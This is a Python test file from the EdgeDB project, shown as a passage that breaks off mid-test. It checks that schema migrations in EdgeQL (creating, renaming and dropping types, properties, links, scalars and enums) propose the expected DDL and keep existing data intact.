| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6af855685ab3713bab1551c32a5b2f165b05dbcf
| 283,734
|
py
|
Python
|
tests/test_edgeql_data_migration.py
|
jamilabreu/edgedb
|
6d3f222e4c5d3300f483b4e06e8f747c6381f313
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edgeql_data_migration.py
|
jamilabreu/edgedb
|
6d3f222e4c5d3300f483b4e06e8f747c6381f313
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edgeql_data_migration.py
|
jamilabreu/edgedb
|
6d3f222e4c5d3300f483b4e06e8f747c6381f313
|
[
"Apache-2.0"
] | null | null | null |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2019-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import json
import os.path
import re
import textwrap
import uuid
import edgedb
from edb.testbase import server as tb
from edb.tools import test
class TestEdgeQLDataMigration(tb.DDLTestCase):
"""Test that migrations preserve data under certain circumstances.
Renaming, changing constraints, increasing cardinality should not
destroy data.
Some of the test cases here use the same migrations as
`test_schema_migrations_equivalence`, therefore the test numbers
should match for easy reference, even if it means skipping some.
"""
DEFAULT_MODULE = 'test'
def normalize_statement(self, s: str) -> str:
re_filter = re.compile(r'[\s]+|(#.*?(\n|$))|(,(?=\s*[})]))')
stripped = textwrap.dedent(s.lstrip('\n')).rstrip('\n')
folded = re_filter.sub('', stripped).lower()
return folded
def cleanup_migration_exp_json(self, exp_result_json):
# Cleanup the expected values by dedenting/stripping them
if 'confirmed' in exp_result_json:
exp_result_json['confirmed'] = [
self.normalize_statement(v)
for v in exp_result_json['confirmed']
]
if (
'proposed' in exp_result_json
and exp_result_json['proposed']
and 'statements' in exp_result_json['proposed']
):
for stmt in exp_result_json['proposed']['statements']:
stmt['text'] = self.normalize_statement(stmt['text'])
async def assert_describe_migration(self, exp_result_json, *, msg=None):
self.cleanup_migration_exp_json(exp_result_json)
try:
res = await self.con.query_single(
'DESCRIBE CURRENT MIGRATION AS JSON;')
res = json.loads(res)
self.cleanup_migration_exp_json(res)
self._assert_data_shape(res, exp_result_json, message=msg)
except Exception:
self.add_fail_notes(serialization='json')
raise
async def fast_forward_describe_migration(
self,
*,
limit: Optional[int] = None,
user_input: Optional[Iterable[str]] = None,
commit: bool = True,
):
'''Repeatedly get the next step from DESCRIBE and execute it.
The point of this as opposed to just using "POPULATE
MIGRATION; COMMIT MIGRATION;" is that we want to make sure
that the generated DDL is valid and in case it's not, narrow
down which step is causing issues.
'''
# Keep track of proposed DDL
prevddl = ''
if user_input is None:
input_iter: Iterator[str] = iter(tuple())
else:
input_iter = iter(user_input)
try:
step = 0
while True:
mig = await self.con.query_single(
'DESCRIBE CURRENT MIGRATION AS JSON;')
mig = json.loads(mig)
if mig['proposed'] is None:
self._assert_data_shape(
mig, {'complete': True},
message='No more "proposed", but not "completed" '
'either.'
)
if commit:
await self.con.execute('COMMIT MIGRATION;')
break
interpolations = {}
user_input_reqs = mig['proposed']['required_user_input']
if user_input_reqs:
for var in user_input_reqs:
var_name = var['placeholder']
var_desc = var['prompt']
try:
var_value = next(input_iter)
except StopIteration:
raise AssertionError(
f'missing input value for prompt: {var_desc}'
) from None
interpolations[var_name] = var_value
for stmt in mig['proposed']['statements']:
curddl = stmt['text']
if interpolations:
def _replace(match):
var_name = match.group(1)
var_value = interpolations.get(var_name)
if var_value is None:
raise AssertionError(
f'missing value for '
f'placeholder {var_name!r}'
)
return var_value
curddl = re.sub(r'\\\((\w+)\)', _replace, curddl)
if prevddl == curddl:
raise Exception(
f"Repeated previous proposed DDL {curddl!r}"
)
try:
await self.con.execute(curddl)
except Exception as exc:
raise Exception(
f"Error while processing {curddl!r}"
) from exc
prevddl = curddl
step += 1
if limit is not None and step == limit:
break
except Exception:
self.add_fail_notes(serialization='json')
raise
async def start_migration(self, migration, *,
populate: bool = False,
module: str = 'test'):
mig = f"""
START MIGRATION TO {{
module {module} {{
{migration}
}}
}};
"""
await self.con.execute(mig)
if populate:
await self.con.execute('POPULATE MIGRATION;')
async def migrate(
self,
migration,
*,
populate: bool = False,
module: str = 'test',
user_input: Optional[Iterable[str]] = None,
):
async with self.con.transaction():
await self.start_migration(
migration, populate=populate, module=module)
await self.fast_forward_describe_migration(user_input=user_input)
async def interact(self, parts, check_complete=True):
for part in parts:
if isinstance(part, str):
prompt = part
ans = "y"
user_input = None
else:
prompt, ans, *user_input = part
await self.assert_describe_migration({
'proposed': {'prompt': prompt}
})
if ans == "y":
await self.fast_forward_describe_migration(
limit=1, user_input=user_input)
else:
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
if check_complete:
await self.assert_describe_migration({
'complete': True
})
async def test_edgeql_migration_simple_01(self):
# Base case, ensuring a single SDL migration from a clean
# state works.
await self.migrate("""
type NamedObject {
required property name -> str;
multi link related -> NamedObject {
property lang -> str;
};
};
""")
await self.con.execute("""
SET MODULE test;
INSERT NamedObject {
name := 'Test'
};
INSERT NamedObject {
name := 'Test 2',
related := (SELECT DETACHED NamedObject
FILTER .name = 'Test')
};
""")
await self.assert_query_result(
r"""
SELECT
NamedObject {
related: {
name,
@lang
}
}
FILTER
.name = 'Test 2';
""",
[
{
'related': [{'name': 'Test', '@lang': None}],
}
]
)
async def test_edgeql_migration_link_inheritance(self):
schema_f = os.path.join(os.path.dirname(__file__), 'schemas',
'links_1.esdl')
with open(schema_f) as f:
schema = f.read()
await self.migrate(schema)
await self.con.execute('''
SET MODULE test;
INSERT Target1 {
name := 'Target1_linkinh_2'
};
INSERT ObjectType01 {
target := (SELECT Target1
FILTER .name = 'Target1_linkinh_2'
LIMIT 1)
};
INSERT Target0 {
name := 'Target0_linkinh_2'
};
INSERT ObjectType23 {
target := (SELECT Target0
FILTER .name = 'Target0_linkinh_2'
LIMIT 1)
};
''')
await self.con.query('DECLARE SAVEPOINT t0;')
with self.assertRaisesRegex(
edgedb.InvalidLinkTargetError,
r"invalid target for link 'target' of object type "
r"'test::ObjectType01': "
r"'test::Target0' \(expecting 'test::Target1'\)"):
# Target0 is not allowed to be targeted by ObjectType01, since
# ObjectType01 inherits from ObjectType1 which requires more
# specific Target1.
await self.con.execute('''
INSERT ObjectType01 {
target := (
SELECT
Target0
FILTER
.name = 'Target0_linkinh_2'
LIMIT 1
)
};
''')
schema_f = os.path.join(os.path.dirname(__file__), 'schemas',
'links_1_migrated.esdl')
with open(schema_f) as f:
schema = f.read()
await self.con.query('ROLLBACK TO SAVEPOINT t0')
await self.migrate(schema)
async def test_edgeql_migration_describe_reject_01(self):
await self.migrate('''
type Foo;
''')
await self.start_migration('''
type Bar;
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Foo RENAME TO test::Bar;
"""
}]
}
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': """
CREATE TYPE test::Bar;
"""
}]
}
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': """
DROP TYPE test::Foo;
"""
}]
}
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'proposed': None,
'complete': False,
})
async def test_edgeql_migration_describe_reject_02(self):
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'parent': 'm1a2l6lbzimqokzygdzbkyjrhbmjh3iljg7i2m6r2ias2z2de4x4cq',
'confirmed': [],
'complete': True,
'proposed': None,
})
# Reject an empty proposal, which should be an idempotent
# operation. So reject it several times.
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
async def test_edgeql_migration_describe_reject_03(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Type0;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE TYPE test::Type0;'
}],
'prompt': "did you create object type 'test::Type0'?",
},
})
# Reject a proposal until we run out of options.
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': None,
})
async def test_edgeql_migration_describe_reject_04(self):
# Migration involving 2 modules
await self.con.execute('''
START MIGRATION TO {
module test {
type Test;
};
module other {
type Test;
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Test2;
};
module other {
type Test3;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE other::Test RENAME TO other::Test3;',
}],
'prompt': (
"did you rename object type 'other::Test' to "
"'other::Test3'?"
),
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE other::Test RENAME TO test::Test2;',
}],
'prompt': (
"did you rename object type 'other::Test' to "
"'test::Test2'?"
),
},
})
await self.con.execute('''
ALTER TYPE other::Test RENAME TO test::Test2;
''')
await self.assert_describe_migration({
'confirmed': [
'ALTER TYPE other::Test RENAME TO test::Test2;'
],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE test::Test RENAME TO other::Test3;',
}],
'prompt': (
"did you rename object type 'test::Test' to "
"'other::Test3'?"
),
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'confirmed': [
'ALTER TYPE other::Test RENAME TO test::Test2;'
],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE TYPE other::Test3;',
}],
'prompt': (
"did you create object type 'other::Test3'?"
),
},
})
# Change our mind and use a rejected operation to rename the
# type after all. So, we should be done now.
await self.con.execute('''
ALTER TYPE test::Test RENAME TO other::Test3;
''')
await self.assert_describe_migration({
'confirmed': [
'ALTER TYPE other::Test RENAME TO test::Test2;',
'ALTER TYPE test::Test RENAME TO other::Test3;',
],
'complete': True,
'proposed': None,
})
async def test_edgeql_migration_describe_reject_05(self):
await self.migrate('''
type User {
required property username -> str {
constraint exclusive;
constraint regexp(r'asdf');
}
}
''')
await self.start_migration('''
type User {
required property username -> str {
constraint exclusive;
constraint regexp(r'foo');
}
}
''')
await self.assert_describe_migration({
'proposed': {
'prompt': (
"did you drop constraint 'std::regexp' "
"of property 'username'?"
)
}
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
# ... nothing to do, we can't get it
await self.assert_describe_migration({
'complete': False,
'proposed': None,
})
async def test_edgeql_migration_describe_module_01(self):
# Migration that creates a new module.
await self.con.execute('''
START MIGRATION TO {
module new_module {
type Type0;
};
};
''')
# Validate that we create a 'new_module'
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE MODULE new_module IF NOT EXISTS;'
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
# Drop the 'new_module'
await self.con.execute('''
START MIGRATION TO {
module default {};
};
''')
# Validate that we drop a 'new_module'
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'DROP TYPE new_module::Type0;'
}],
},
})
await self.con.execute('''
DROP TYPE new_module::Type0;
''')
await self.assert_describe_migration({
'confirmed': [
'DROP TYPE new_module::Type0;'
],
'complete': False,
'proposed': {
'statements': [{
'text': 'DROP MODULE new_module;'
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
# Make sure that 'new_module' can be created again with no
# problems (i.e. it was dropped cleanly).
await self.con.execute('''
START MIGRATION TO {
module new_module {
type Type0;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE MODULE new_module IF NOT EXISTS;'
}],
},
})
await self.con.execute('''
CREATE MODULE new_module;
''')
await self.assert_describe_migration({
'confirmed': [
'CREATE MODULE new_module;',
],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE TYPE new_module::Type0;'
}],
},
})
await self.con.execute('''
CREATE TYPE new_module::Type0;
COMMIT MIGRATION;
''')
await self.assert_query_result(
r"""
INSERT new_module::Type0;
""",
[{
'id': uuid.UUID,
}],
)
async def test_edgeql_migration_describe_type_01(self):
# Migration that renames a type.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type1;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1a2l6lbzimqokzygdzbkyjrhbmjh3iljg7i2m6r2ias2z2de4x4cq',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type1;'
)
}],
'prompt': "did you create object type 'test::Type1'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
res = await self.con.query(r'''INSERT test::Type1;''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Type01;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1jywblj6c7z25ouifcicpxniu37jdpyunf62q4th7isdafcqu67gq',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type1 RENAME TO test::Type01;'
)
}],
'prompt': (
"did you rename object type 'test::Type1' to "
"'test::Type01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type01;
''', [{'id': res[0].id}])
async def test_edgeql_migration_describe_type_02(self):
# Migration that creates a type.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1a2l6lbzimqokzygdzbkyjrhbmjh3iljg7i2m6r2ias2z2de4x4cq',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type02;'
)
}],
'prompt': "did you create object type 'test::Type02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.con.query(r'''INSERT test::Type02;''')
# Migration that drops a type.
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'parent': 'm1fcvk56n44i62qwjnw5nqgafnbpulfhhaeb6kxqhh4c6lc4elwysa',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'DROP TYPE test::Type02;'
)
}],
'prompt': (
"did you drop object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
WITH MODULE schema
SELECT ObjectType
FILTER .name = 'test::Type02';
''', [])
# Make sure that type dropped cleanly by re-creating and
# using the type again.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1yee6qj63nps27cjnrcudwiupusdqkzrwistpvfbqf2fstcmwauwa',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type02;'
)
}],
'prompt': "did you create object type 'test::Type02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
INSERT test::Type02;
''', [{'id': uuid.UUID}])
async def test_edgeql_migration_describe_type_03(self):
await self.migrate('''
type Type0;
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Type1;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': "ALTER TYPE test::Type0 RENAME TO test::Type1;"
}],
'prompt': (
"did you rename object type 'test::Type0' to "
"'test::Type1'?"
),
},
})
# Instead of the suggestion do a couple of different, but
# equivalent commands.
await self.con.execute('''
ALTER TYPE test::Type0 RENAME TO test::TypeXX;
ALTER TYPE test::TypeXX RENAME TO test::Type1;
''')
await self.assert_describe_migration({
'confirmed': [
'ALTER TYPE test::Type0 RENAME TO test::TypeXX;',
'ALTER TYPE test::TypeXX RENAME TO test::Type1;',
],
'complete': True,
'proposed': None,
})
async def test_edgeql_migration_describe_type_04(self):
self.maxDiff = None
await self.migrate('''
type Test;
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Test2;
type Test3;
};
};
''')
await self.assert_describe_migration({
'parent': 'm1xh653zionj2aehqbh7x6km5lo3b2mjaftxdkvqoh3wluc3iv6k2a',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE test::Test RENAME TO test::Test2;',
}],
'prompt': (
"did you rename object type 'test::Test' to 'test::Test2'?"
),
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'parent': 'm1xh653zionj2aehqbh7x6km5lo3b2mjaftxdkvqoh3wluc3iv6k2a',
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': 'ALTER TYPE test::Test RENAME TO test::Test3;',
}],
'prompt': (
"did you rename object type 'test::Test' to 'test::Test3'?"
),
},
})
await self.con.execute('''
ALTER TYPE test::Test RENAME TO test::Test3;
''')
await self.assert_describe_migration({
'parent': 'm1xh653zionj2aehqbh7x6km5lo3b2mjaftxdkvqoh3wluc3iv6k2a',
'confirmed': ['ALTER TYPE test::Test RENAME TO test::Test3;'],
'complete': False,
'proposed': {
'statements': [{
'text': 'CREATE TYPE test::Test2;',
}],
'prompt': (
"did you create object type 'test::Test2'?"
),
},
})
async def test_edgeql_migration_describe_property_01(self):
# Migration that renames a property.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type01 {
property field1 -> str;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type01 {\n'
' CREATE PROPERTY field1'
' -> std::str;\n'
'};'
)
}],
'prompt': "did you create object type 'test::Type01'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.con.execute('''
INSERT test::Type01 {
field1 := 'prop_test'
};
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Type01 {
property field01 -> str;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type01 {\n'
' ALTER PROPERTY field1 {\n'
' RENAME TO field01;\n'
' };\n'
'};'
)
}],
'prompt': (
"did you rename property 'field1' of object type"
" 'test::Type01' to 'field01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type01 {
field01
};
''', [{'field01': 'prop_test'}])
async def test_edgeql_migration_describe_property_02(self):
# Migration that creates a type with property.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02 {
property field02 -> str;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type02 {\n'
' CREATE PROPERTY field02'
' -> std::str;\n'
'};'
)
}],
'prompt': "did you create object type 'test::Type02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
res = await self.con.query('''
INSERT test::Type02 {
field02 := 'prop_test'
};
''')
# Migration that drops a property.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type02 {\n'
' DROP PROPERTY field02;\n'
'};'
)
}],
'prompt': (
"did you drop property 'field02'"
" of object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type02 {
id
};
''', [{
'id': res[0].id
}])
# Make sure that property dropped cleanly by re-creating and
# using the property again.
await self.con.execute('''
START MIGRATION TO {
module test {
type Type02 {
property field02 -> str;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type02 {\n'
' CREATE PROPERTY field02'
' -> std::str;\n'
'};'
)
}],
'prompt': (
"did you create property 'field02'"
" of object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type02 {
id,
field02,
};
''', [{
'id': res[0].id,
'field02': None,
}])
async def test_edgeql_migration_describe_link_01(self):
# Migration that renames a link.
await self.con.execute(r'''
START MIGRATION TO {
module test {
type Foo;
type Type01 {
link foo1 -> Foo;
};
};
};
# just initialize Foo, since we're interested in the other type
CREATE TYPE test::Foo;
''')
await self.assert_describe_migration({
'confirmed': ['CREATE TYPE test::Foo;'],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type01 {\n'
' CREATE LINK foo1'
' -> test::Foo;\n'
'};'
)
}],
'prompt': "did you create object type 'test::Type01'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
res = await self.con.query('''
WITH MODULE test
SELECT (
INSERT Type01 {
foo1 := (INSERT Foo)
}
) {
foo1
};
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Foo;
type Type01 {
link foo01 -> Foo;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type01 {\n'
' ALTER LINK foo1 {\n'
' RENAME TO foo01;\n'
' };\n'
'};'
)
}],
'prompt': (
"did you rename link 'foo1' of object type"
" 'test::Type01' to 'foo01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type01 {
foo01: {
id
}
};
''', [{'foo01': {'id': res[0].foo1.id}}])
async def test_edgeql_migration_describe_link_02(self):
# Migration that creates a type with link.
await self.con.execute(r'''
START MIGRATION TO {
module test {
type Foo;
type Type02 {
link foo02 -> Foo;
};
};
};
# just initialize Foo, since we're interested in the other type
CREATE TYPE test::Foo;
''')
await self.assert_describe_migration({
'confirmed': ['CREATE TYPE test::Foo;'],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE TYPE test::Type02 {\n'
' CREATE LINK foo02'
' -> test::Foo;\n'
'};'
)
}],
'prompt': "did you create object type 'test::Type02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
res = await self.con.query('''
WITH MODULE test
SELECT (
INSERT Type02 {
foo02 := (INSERT Foo)
}
) {
foo02
}
''')
# Migration that drops a link.
await self.con.execute('''
START MIGRATION TO {
module test {
type Foo;
type Type02;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type02 {\n'
' DROP LINK foo02;\n'
'};'
)
}],
'prompt': (
"did you drop link 'foo02' of object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type02 {
id
};
''', [{
'id': res[0].id
}])
await self.assert_query_result('''
SELECT test::Foo {
id
};
''', [{
'id': res[0].foo02.id
}])
# Make sure that link dropped cleanly by re-creating and
# using the link again.
await self.con.execute('''
START MIGRATION TO {
module test {
type Foo;
type Type02 {
link foo02 -> Foo;
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::Type02 {\n'
' CREATE LINK foo02'
' -> test::Foo;\n'
'};'
)
}],
'prompt': (
"did you create link 'foo02'"
" of object type 'test::Type02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT test::Type02 {
id,
foo02: {
id
},
};
''', [{
'id': res[0].id,
'foo02': None,
}])
async def test_edgeql_migration_describe_link_03(self):
# Migration that renames a link.
await self.con.execute(r'''
START MIGRATION TO {
module test {
abstract link foo3;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT LINK test::foo3;'
)
}],
'prompt': "did you create abstract link 'test::foo3'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
abstract link foo03;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT LINK test::foo3 '
'RENAME TO test::foo03;'
)
}],
'prompt': (
"did you rename abstract link 'test::foo3' to "
"'test::foo03'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'DROP ABSTRACT LINK test::foo03;'
)
}],
'prompt': (
"did you drop abstract link 'test::foo03'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
async def test_edgeql_migration_describe_scalar_01(self):
# Migration that renames a type.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type ScalarType1 extending int64;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE SCALAR TYPE test::ScalarType1'
' EXTENDING std::int64;'
)
}],
'prompt': "did you create scalar type 'test::ScalarType1'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::ScalarType1>'1' + 2;
''', [3])
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type ScalarType01 extending int64;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER SCALAR TYPE test::ScalarType1'
' RENAME TO test::ScalarType01;'
)
}],
'prompt': (
"did you rename scalar type 'test::ScalarType1' to "
"'test::ScalarType01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::ScalarType01>'2' + 1;
''', [3])
async def test_edgeql_migration_describe_scalar_02(self):
# Migration that creates a type.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type ScalarType02 extending str;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE SCALAR TYPE test::ScalarType02'
' EXTENDING std::str;'
)
}],
'prompt': "did you create scalar type 'test::ScalarType02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::ScalarType02>1 ++ '2';
''', ['12'])
# Migration that drops a type.
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'DROP SCALAR TYPE test::ScalarType02;'
)
}],
'prompt': (
"did you drop scalar type 'test::ScalarType02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
WITH MODULE schema
SELECT ScalarType
FILTER .name = 'test::ScalarType02';
''', [])
# Make sure that type dropped cleanly by re-creating and
# using the type again.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type ScalarType02 extending str;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE SCALAR TYPE test::ScalarType02'
' EXTENDING std::str;'
)
}],
'prompt': "did you create scalar type 'test::ScalarType02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::ScalarType02>2 ++ '1';
''', ['21'])
async def test_edgeql_migration_describe_enum_01(self):
# Migration that renames an enum.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type EnumType1 extending enum<foo, bar>;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
"CREATE SCALAR TYPE test::EnumType1"
" EXTENDING enum<foo, bar>;"
)
}],
'prompt': "did you create scalar type 'test::EnumType1'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::EnumType1>'bar';
''', ['bar'])
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type EnumType01 extending enum<foo, bar>;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER SCALAR TYPE test::EnumType1'
' RENAME TO test::EnumType01;'
)
}],
'prompt': (
"did you rename scalar type 'test::EnumType1' to "
"'test::EnumType01'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::EnumType01>'foo';
''', ['foo'])
async def test_edgeql_migration_describe_enum_02(self):
# Migration that creates an enum.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type EnumType02 extending enum<foo, bar>;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
"CREATE SCALAR TYPE test::EnumType02"
" EXTENDING enum<foo, bar>;"
)
}],
'prompt': "did you create scalar type 'test::EnumType02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::EnumType02>'bar';
''', ['bar'])
# Migration that drops an enum.
await self.con.execute('''
START MIGRATION TO {
module test {
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
